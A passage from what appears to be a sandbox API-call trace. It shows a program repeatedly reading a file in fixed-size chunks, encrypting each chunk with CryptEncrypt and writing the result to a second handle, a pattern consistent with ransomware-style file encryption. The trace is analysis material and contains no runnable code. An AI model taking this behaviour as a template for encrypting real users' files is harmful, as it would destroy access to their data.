lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.145] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.146] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.147] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.148] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.149] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.150] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.151] CryptEncrypt (in: hKey=0x2fb208, 